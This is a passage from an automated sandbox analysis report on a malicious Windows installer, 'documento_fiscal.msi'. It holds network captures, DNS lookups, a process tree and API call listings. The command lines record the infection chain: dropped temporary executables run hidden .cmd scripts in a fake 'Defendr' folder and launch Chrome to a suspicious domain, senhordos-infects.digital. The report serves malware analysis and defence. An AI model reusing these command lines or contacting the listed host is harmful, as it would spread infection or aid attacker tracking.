Aug 4, 2024 13:59:59.518707037 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.518742085 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.518762112 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.519681931 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.519745111 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.519764900 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.519768953 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.519790888 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.519814014 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.522531033 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.522531033 CEST	49748	443	192.168.2.4	20.114.59.183
Aug 4, 2024 13:59:59.522568941 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 13:59:59.522591114 CEST	443	49748	20.114.59.183	192.168.2.4
Aug 4, 2024 14:00:00.257355928 CEST	80	49730	45.178.182.88	192.168.2.4
Aug 4, 2024 14:00:00.257616043 CEST	49730	80	192.168.2.4	45.178.182.88
Aug 4, 2024 14:00:00.700294971 CEST	49730	80	192.168.2.4	45.178.182.88
Aug 4, 2024 14:00:00.705477953 CEST	80	49730	45.178.182.88	192.168.2.4
Aug 4, 2024 14:00:12.167407990 CEST	49724	80	192.168.2.4	93.184.221.240
Aug 4, 2024 14:00:12.173095942 CEST	80	49724	93.184.221.240	192.168.2.4
Aug 4, 2024 14:00:12.173248053 CEST	49724	80	192.168.2.4	93.184.221.240
Aug 4, 2024 14:00:12.496551991 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:12.496608019 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:12.496690989 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:12.496928930 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:12.496939898 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:13.155999899 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:13.156414986 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:13.156435013 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:13.156882048 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:13.157286882 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:13.157351017 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:13.198472023 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:23.213087082 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:23.213234901 CEST	443	49750	216.58.206.68	192.168.2.4
Aug 4, 2024 14:00:23.213298082 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:24.700920105 CEST	49750	443	192.168.2.4	216.58.206.68
Aug 4, 2024 14:00:24.700964928 CEST	443	49750	216.58.206.68	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2024 13:59:07.914091110 CEST	63374	53	192.168.2.4	1.1.1.1
Aug 4, 2024 13:59:07.914236069 CEST	54841	53	192.168.2.4	1.1.1.1
Aug 4, 2024 13:59:07.919382095 CEST	53	56105	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:08.008203030 CEST	53	62784	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:08.013219118 CEST	53	54841	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:08.112682104 CEST	53	63374	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:09.212536097 CEST	53	51660	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:12.439646006 CEST	58221	53	192.168.2.4	1.1.1.1
Aug 4, 2024 13:59:12.439826012 CEST	56953	53	192.168.2.4	1.1.1.1
Aug 4, 2024 13:59:12.446439981 CEST	53	58221	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:12.447038889 CEST	53	56953	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:23.751008034 CEST	138	138	192.168.2.4	192.168.2.255
Aug 4, 2024 13:59:26.255009890 CEST	53	53061	1.1.1.1	192.168.2.4
Aug 4, 2024 13:59:45.223165035 CEST	53	60654	1.1.1.1	192.168.2.4
Aug 4, 2024 14:00:07.584656000 CEST	53	53071	1.1.1.1	192.168.2.4
Aug 4, 2024 14:00:07.857469082 CEST	53	56175	1.1.1.1	192.168.2.4
Aug 4, 2024 14:00:35.631305933 CEST	53	58083	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 4, 2024 13:59:07.914091110 CEST	192.168.2.4	1.1.1.1	0x4f11	Standard query (0)	senhordos-infects.digital	A (IP address)	IN (0x0001)	false
Aug 4, 2024 13:59:07.914236069 CEST	192.168.2.4	1.1.1.1	0x3038	Standard query (0)	senhordos-infects.digital	65	IN (0x0001)	false
Aug 4, 2024 13:59:12.439646006 CEST	192.168.2.4	1.1.1.1	0x6f4c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Aug 4, 2024 13:59:12.439826012 CEST	192.168.2.4	1.1.1.1	0x7155	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 4, 2024 13:59:08.112682104 CEST	1.1.1.1	192.168.2.4	0x4f11	No error (0)	senhordos-infects.digital	45.178.182.88	A (IP address)	IN (0x0001)	false
Aug 4, 2024 13:59:12.446439981 CEST	1.1.1.1	192.168.2.4	0x6f4c	No error (0)	www.google.com	216.58.206.68	A (IP address)	IN (0x0001)	false
Aug 4, 2024 13:59:12.447038889 CEST	1.1.1.1	192.168.2.4	0x7155	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

fs.microsoft.com

slscr.update.microsoft.com

senhordos-infects.digital

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	45.178.182.88	80	7912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Aug 4, 2024 13:59:08.171195030 CEST	469	OUT	GET /clientesnew/inspecionando.php HTTP/1.1 Host: senhordos-infects.digital Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Aug 4, 2024 13:59:09.282979012 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 04 Aug 2024 11:59:08 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 4, 2024 13:59:09.333456039 CEST	423	OUT	GET /favicon.ico HTTP/1.1 Host: senhordos-infects.digital Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://senhordos-infects.digital/clientesnew/inspecionando.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Aug 4, 2024 13:59:09.545314074 CEST	503	IN	HTTP/1.1 404 Not Found Date: Sun, 04 Aug 2024 11:59:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 287 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6e 68 6f 72 64 6f 73 2d 69 6e 66 65 63 74 73 2e 64 69 67 69 74 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at senhordos-infects.digital Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49730	45.178.182.88	80	7912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Aug 4, 2024 13:59:53.183310032 CEST	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-04 11:59:13 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-04 11:59:14 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=25944 Date: Sun, 04 Aug 2024 11:59:14 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-04 11:59:14 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-04 11:59:15 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=25956 Date: Sun, 04 Aug 2024 11:59:15 GMT Content-Length: 55 Connection: close X-CID: 2
2024-08-04 11:59:15 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-08-04 11:59:21 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S1a7AvczmF99nUk&MD=xPt65TWF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-08-04 11:59:21 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: d86b1627-2ea2-4eb2-afa4-779e73355c1c MS-RequestId: 1d638d1c-c17d-4caf-bb6b-2530c0a4b0fe MS-CV: YS7XgmEI2kSLfj15.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 04 Aug 2024 11:59:21 GMT Connection: close Content-Length: 24490
2024-08-04 11:59:21 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-08-04 11:59:21 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49748	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-08-04 11:59:59 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S1a7AvczmF99nUk&MD=xPt65TWF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-08-04 11:59:59 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 89f74ca9-58e1-4420-9f10-30dc4fad0a3f MS-RequestId: 943d81f4-6ec6-46de-81b4-4311423891b7 MS-CV: zxwXY2yJQU6HlXXH.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 04 Aug 2024 11:59:59 GMT Connection: close Content-Length: 30005
2024-08-04 11:59:59 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-08-04 11:59:59 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	07:59:00
Start date:	04/08/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\documento_fiscal.msi"
Imagebase:	0x7ff705480000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:59:01
Start date:	04/08/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff705480000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:59:01
Start date:	04/08/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 5BA47DE34B5A6DEE60D2C5FA45A6276E
Imagebase:	0x140000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:59:05
Start date:	04/08/2024
Path:	C:\Windows\Installer\MSI892F.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSI892F.tmp" /DontWait "C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\
Imagebase:	0x190000
File size:	423'936 bytes
MD5 hash:	768B35409005592DE2333371C6253BC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:59:05
Start date:	04/08/2024
Path:	C:\Windows\Installer\MSI894F.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSI894F.tmp" /HideWindow "C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\
Imagebase:	0xd40000
File size:	423'936 bytes
MD5 hash:	768B35409005592DE2333371C6253BC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:59:05
Start date:	04/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\microsoft.cmd" C:\Users\user\Documents\"
Imagebase:	0x7ff634210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:59:05
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:59:05
Start date:	04/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Defendr\cont.cmd" C:\Users\user\AppData\Roaming\Defendr\"
Imagebase:	0x7ff634210000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:59:05
Start date:	04/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:59:06
Start date:	04/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://senhordos-infects.digital/clientesnew/inspecionando.php
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	07:59:06
Start date:	04/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1876,i,4535856844853309651,5125483809637210346,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.6%
Total number of Nodes:	344
Total number of Limit Nodes:	5

Executed Functions

Function 00196EE0 Relevance: 46.0, APIs: 25, Strings: 1, Instructions: 519
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00195F90: GetCurrentProcess.KERNEL32(00000008,?,08E011E3), ref: 00195FA0
Part of subcall function 00195F90: OpenProcessToken.ADVAPI32(00000000), ref: 00195FA7

CoInitialize.OLE32(00000000), ref: 00196F55
CoCreateInstance.OLE32(001DD310,00000000,00000004,001EB320,00000000,?), ref: 00196F85
CoUninitialize.OLE32 ref: 001974F6
_com_issue_error.COMSUPP ref: 00197524

Part of subcall function 00191910: LocalFree.KERNEL32(?,08E011E3,?,00000000,001D92C0,000000FF,?,?,001F1348,00000000,001916D0,80004005), ref: 0019195C

Strings

$, xrefs: 00197454

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
String ID: $
API String ID: 2507920217-3993045852
Opcode ID: 0fd70866354e31cecf29bd627888eb1941e89420311958c7bbc510c44fecbd9a
Instruction ID: 653e7960fdd0f92ff62ee5783faa988490bd4e06d8614bc7ce830d90891dec27
Opcode Fuzzy Hash: 0fd70866354e31cecf29bd627888eb1941e89420311958c7bbc510c44fecbd9a
Instruction Fuzzy Hash: 3A229E70E09388DFEF11CFA8C948BAEBBB8BF55304F248199E405EB291D7759A45CB11

Function 00195F90 Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,08E011E3), ref: 00195FA0
OpenProcessToken.ADVAPI32(00000000), ref: 00195FA7
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00195FDC
CloseHandle.KERNEL32(?), ref: 00195FF2

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

